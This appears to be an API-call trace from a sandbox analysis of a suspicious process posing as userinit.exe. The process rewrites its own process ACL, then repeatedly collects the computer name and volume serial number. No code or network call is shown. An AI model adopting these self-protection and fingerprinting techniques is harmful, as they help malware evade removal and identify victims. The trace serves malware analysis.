[0170.633] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentProcess") returned 0x753bcdcf
[0170.633] GetCurrentProcess () returned 0xffffffff
[0170.633] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0170.633] GetProcAddress (hModule=0x76da0000, lpProcName="OpenProcessToken") returned 0x76db4304
[0170.633] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0xf01ff, TokenHandle=0x291fa3c | out: TokenHandle=0x291fa3c*=0x1d0) returned 1
[0170.633] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0170.633] GetProcAddress (hModule=0x76da0000, lpProcName="MapGenericMask") returned 0x76dc7a73
[0170.633] MapGenericMask (in: AccessMask=0xae714, GenericMapping=0xae718 | out: AccessMask=0xae714)
[0170.633] MapGenericMask (in: AccessMask=0xae848, GenericMapping=0xae84c | out: AccessMask=0xae848)
[0170.633] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0170.633] GetProcAddress (hModule=0x76da0000, lpProcName="GetTokenInformation") returned 0x76db431c
[0170.633] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xae85c | out: TokenInformation=0x0, ReturnLength=0xae85c) returned 0
[0170.633] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0170.634] GetProcAddress (hModule=0x75370000, lpProcName="GetLastError") returned 0x753bbf00
[0170.634] GetLastError () returned 0x7a
[0170.634] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0170.634] GetProcAddress (hModule=0x75370000, lpProcName="HeapAlloc") returned 0x76f72dd6
[0170.634] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x220780, TokenInformationLength=0x24, ReturnLength=0xae880 | out: TokenInformation=0x220780, ReturnLength=0xae880) returned 1
[0170.634] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x291fab0, pSourceSid=0x220788*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x291fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0170.634] IsValidSid (pSid=0x291fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0170.634] ConvertSidToStringSidA () returned 0x1
[0170.634] LocalFree (hMem=0x219e80) returned 0x0
[0170.634] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0170.634] GetProcAddress (hModule=0x75370000, lpProcName="HeapFree") returned 0x753bbbd0
[0170.634] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x291fb34, pSourceSid=0x291fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x291fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0170.634] IsValidSid (pSid=0x291fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0170.634] ConvertSidToStringSidA () returned 0x1
[0170.634] LocalFree (hMem=0x219e80) returned 0x0
[0170.634] IsValidSid (pSid=0x291fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0170.634] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0170.635] GetProcAddress (hModule=0x75370000, lpProcName="CloseHandle") returned 0x753bca7c
[0170.635] CloseHandle (hObject=0x1d0) returned 1
[0170.635] ConvertStringSidToSidA () returned 0x1
[0170.635] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x291fa54, pSourceSid=0x226f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000) | out: pDestinationSid=0x291fa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0170.635] IsValidSid (pSid=0x291fa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0170.635] ConvertSidToStringSidA () returned 0x1
[0170.635] LocalFree (hMem=0x226f58) returned 0x0
[0170.635] LocalFree (hMem=0x226f40) returned 0x0
[0170.635] ConvertStringSidToSidA () returned 0x1
[0170.635] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x291fae0, pSourceSid=0x226f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000) | out: pDestinationSid=0x291fae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0170.635] IsValidSid (pSid=0x291fae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0170.635] ConvertSidToStringSidA () returned 0x1
[0170.635] LocalFree (hMem=0x226f58) returned 0x0
[0170.635] LocalFree (hMem=0x226f40) returned 0x0
[0170.635] ConvertStringSidToSidA () returned 0x1
[0170.635] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x291fbfc, pSourceSid=0x226f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000) | out: pDestinationSid=0x291fbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0170.635] IsValidSid (pSid=0x291fbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0170.635] ConvertSidToStringSidA () returned 0x1
[0170.635] LocalFree (hMem=0x226f58) returned 0x0
[0170.635] LocalFree (hMem=0x226f40) returned 0x0
[0170.635] ConvertStringSidToSidA () returned 0x1
[0170.635] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x291fc8c, pSourceSid=0x226f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000) | out: pDestinationSid=0x291fc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0170.635] IsValidSid (pSid=0x291fc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0170.635] ConvertSidToStringSidA () returned 0x1
[0170.635] LocalFree (hMem=0x226f58) returned 0x0
[0170.635] LocalFree (hMem=0x226f40) returned 0x0
[0170.635] ConvertStringSidToSidA () returned 0x1
[0170.635] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x291fd1c, pSourceSid=0x226f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000) | out: pDestinationSid=0x291fd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0170.635] IsValidSid (pSid=0x291fd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0170.635] ConvertSidToStringSidA () returned 0x1
[0170.635] LocalFree (hMem=0x226f58) returned 0x0
[0170.636] LocalFree (hMem=0x226f40) returned 0x0
[0170.636] GetCurrentProcessId () returned 0x850
[0170.636] OpenProcess (dwDesiredAccess=0x60000, bInheritHandle=0, dwProcessId=0x850) returned 0x1d0
[0170.636] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0170.636] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityInfo") returned 0x76dab3e4
[0170.636] GetSecurityInfo () returned 0x0
[0170.639] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0170.639] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorControl") returned 0x76daaddf
[0170.639] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x220f28, pControl=0xae622, lpdwRevision=0xae61c | out: pControl=0xae622, lpdwRevision=0xae61c) returned 1
[0170.639] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0170.639] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorOwner") returned 0x76daadf7
[0170.639] GetSecurityDescriptorOwner (in: pSecurityDescriptor=0x220f28, pOwner=0xae618, lpbOwnerDefaulted=0xae60c | out: pOwner=0xae618*=0x0, lpbOwnerDefaulted=0xae60c) returned 1
[0170.639] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0170.639] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorGroup") returned 0x76daae27
[0170.639] GetSecurityDescriptorGroup (in: pSecurityDescriptor=0x220f28, pGroup=0xae618, lpbGroupDefaulted=0xae60c | out: pGroup=0xae618*=0x0, lpbGroupDefaulted=0xae60c) returned 1
[0170.640] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0170.640] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorDacl") returned 0x76db41a6
[0170.640] GetSecurityDescriptorDacl (in: pSecurityDescriptor=0x220f28, lpbDaclPresent=0xae610, pDacl=0xae604, lpbDaclDefaulted=0xae60c | out: lpbDaclPresent=0xae610, pDacl=0xae604, lpbDaclDefaulted=0xae60c) returned 1
[0170.640] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0170.640] GetProcAddress (hModule=0x76da0000, lpProcName="IsValidAcl") returned 0x76da8523
[0170.640] IsValidAcl (pAcl=0x220f3c) returned 1
[0170.640] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0170.640] GetProcAddress (hModule=0x76da0000, lpProcName="GetAce") returned 0x76db45f0
[0170.640] GetAce (in: pAcl=0x220f3c, dwAceIndex=0x0, pAce=0xae4a4 | out: pAce=0xae4a4*=0x220f44) returned 1
[0170.640] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x291fe74, pSourceSid=0x220f4c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x291fe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0170.640] IsValidSid (pSid=0x291fe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0170.640] ConvertSidToStringSidA () returned 0x1
[0170.640] LocalFree (hMem=0x227018) returned 0x0
[0170.640] GetAce (in: pAcl=0x220f3c, dwAceIndex=0x1, pAce=0xae4a4 | out: pAce=0xae4a4*=0x220f5c) returned 1
[0170.640] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x291ff60, pSourceSid=0x220f64*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x291ff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0170.640] IsValidSid (pSid=0x291ff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0170.640] ConvertSidToStringSidA () returned 0x1
[0170.640] LocalFree (hMem=0x227018) returned 0x0
[0170.640] GetAce (in: pAcl=0x220f3c, dwAceIndex=0x2, pAce=0xae4a4 | out: pAce=0xae4a4*=0x220f70) returned 1
[0170.640] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29129c0, pSourceSid=0x220f78*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0)) | out: pDestinationSid=0x29129c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0170.640] IsValidSid (pSid=0x29129c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0170.641] ConvertSidToStringSidA () returned 0x1
[0170.641] LocalFree (hMem=0x227018) returned 0x0
[0170.641] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0170.641] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorSacl") returned 0x76db4608
[0170.641] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x220f28, lpbSaclPresent=0xae614, pSacl=0xae608, lpbSaclDefaulted=0xae60c | out: lpbSaclPresent=0xae614, pSacl=0xae608, lpbSaclDefaulted=0xae60c) returned 1
[0170.641] LocalFree (hMem=0x220f28) returned 0x0
[0170.641] IsValidSid (pSid=0x291f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0170.641] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0170.641] GetProcAddress (hModule=0x76da0000, lpProcName="GetLengthSid") returned 0x76db413b
[0170.641] GetLengthSid (pSid=0x291f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0170.641] GetLastError () returned 0x0
[0170.641] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0170.641] GetProcAddress (hModule=0x75370000, lpProcName="GlobalAlloc") returned 0x753b9ce1
[0170.641] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0170.641] GetProcAddress (hModule=0x76da0000, lpProcName="InitializeAcl") returned 0x76db45cd
[0170.642] InitializeAcl (in: pAcl=0x227fa8, nAclLength=0x1c, dwAclRevision=0x2 | out: pAcl=0x227fa8) returned 1
[0170.642] IsValidSid (pSid=0x291f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0170.642] GetLengthSid (pSid=0x291f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0170.642] GetLastError () returned 0x0
[0170.642] IsValidSid (pSid=0x291f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0170.642] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0170.642] GetProcAddress (hModule=0x75370000, lpProcName="SetLastError") returned 0x753bbb08
[0170.642] SetLastError (dwErrCode=0x0)
[0170.642] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0170.642] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthorityCount") returned 0x76db0e0c
[0170.642] GetSidSubAuthorityCount (pSid=0x291f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x291f615
[0170.642] GetLastError () returned 0x0
[0170.642] IsValidSid (pSid=0x291f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0170.642] SetLastError (dwErrCode=0x0)
[0170.643] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0170.643] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidIdentifierAuthority") returned 0x76daa935
[0170.643] GetSidIdentifierAuthority (pSid=0x291f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x291f616
[0170.643] GetLastError () returned 0x0
[0170.643] IsValidSid (pSid=0x291f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0170.643] IsValidSid (pSid=0x291f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0170.643] SetLastError (dwErrCode=0x0)
[0170.643] GetSidSubAuthorityCount (pSid=0x291f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x291f615
[0170.643] GetLastError () returned 0x0
[0170.643] SetLastError (dwErrCode=0x0)
[0170.643] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0170.643] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthority") returned 0x76db0e24
[0170.643] GetSidSubAuthority (pSid=0x291f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), nSubAuthority=0x0) returned 0x291f61c
[0170.643] GetLastError () returned 0x0
[0170.643] IsValidSid (pSid=0x291f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0170.643] GetLengthSid (pSid=0x291f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0170.643] GetLastError () returned 0x0
[0170.643] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0170.643] GetProcAddress (hModule=0x76da0000, lpProcName="AddAce") returned 0x76daae0f
[0170.643] AddAce (in: pAcl=0x227fa8, dwAceRevision=0x2, dwStartingAceIndex=0xffffffff, pAceList=0x212f90, nAceListLength=0x14 | out: pAcl=0x227fa8) returned 1
[0170.643] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0170.644] GetProcAddress (hModule=0x75370000, lpProcName="GlobalFree") returned 0x753b9cf9
[0170.644] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0170.644] GetProcAddress (hModule=0x76da0000, lpProcName="SetSecurityInfo") returned 0x76da9edf
[0170.644] SetSecurityInfo () returned 0x0
[0170.644] CloseHandle (hObject=0x1d0) returned 1
[0170.644] GetComputerNameA (in: lpBuffer=0x291fd84, nSize=0xae8dc | out: lpBuffer="CRH2YWU7", nSize=0xae8dc) returned 1
[0170.644] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xae7c8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0170.644] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xae8c4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xae8d8, lpMaximumComponentLength=0xae8d4, lpFileSystemFlags=0xae8d0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xae8d8*=0x90c08a66, lpMaximumComponentLength=0xae8d4*=0xff, lpFileSystemFlags=0xae8d0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0170.645] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xae7d0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0170.645] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xae8c4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xae8d8, lpMaximumComponentLength=0xae8d4, lpFileSystemFlags=0xae8d0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xae8d8*=0x90c08a66, lpMaximumComponentLength=0xae8d4*=0xff, lpFileSystemFlags=0xae8d0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0170.645] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xae7d0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0170.645] VirtualAlloc (lpAddress=0x2920000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2920000
[0170.645] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xae8c4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xae8d8, lpMaximumComponentLength=0xae8d4, lpFileSystemFlags=0xae8d0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xae8d8*=0x90c08a66, lpMaximumComponentLength=0xae8d4*=0xff, lpFileSystemFlags=0xae8d0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0170.645] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xae7c8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0170.645] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xae8c4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xae8d8, lpMaximumComponentLength=0xae8d4, lpFileSystemFlags=0xae8d0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xae8d8*=0x90c08a66, lpMaximumComponentLength=0xae8d4*=0xff, lpFileSystemFlags=0xae8d0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0170.646] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xae7c8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0170.646] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xae8c4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xae8d8, lpMaximumComponentLength=0xae8d4, lpFileSystemFlags=0xae8d0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xae8d8*=0x90c08a66, lpMaximumComponentLength=0xae8d4*=0xff, lpFileSystemFlags=0xae8d0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0170.646] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xae7c8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0170.646] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xae8c4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xae8d8, lpMaximumComponentLength=0xae8d4, lpFileSystemFlags=0xae8d0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xae8d8*=0x90c08a66, lpMaximumComponentLength=0xae8d4*=0xff, lpFileSystemFlags=0xae8d0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0170.646] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xae7c8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0170.646] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xae8c4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xae8d8, lpMaximumComponentLength=0xae8d4, lpFileSystemFlags=0xae8d0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xae8d8*=0x90c08a66, lpMaximumComponentLength=0xae8d4*=0xff, lpFileSystemFlags=0xae8d0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0170.646] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xae7c8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0170.646] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xae8c4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xae8d8, lpMaximumComponentLength=0xae8d4, lpFileSystemFlags=0xae8d0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xae8d8*=0x90c08a66, lpMaximumComponentLength=0xae8d4*=0xff, lpFileSystemFlags=0xae8d0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0170.647] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xae7c8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0170.647] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xae8c4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xae8d8, lpMaximumComponentLength=0xae8d4, lpFileSystemFlags=0xae8d0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xae8d8*=0x90c08a66, lpMaximumComponentLength=0xae8d4*=0xff, lpFileSystemFlags=0xae8d0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
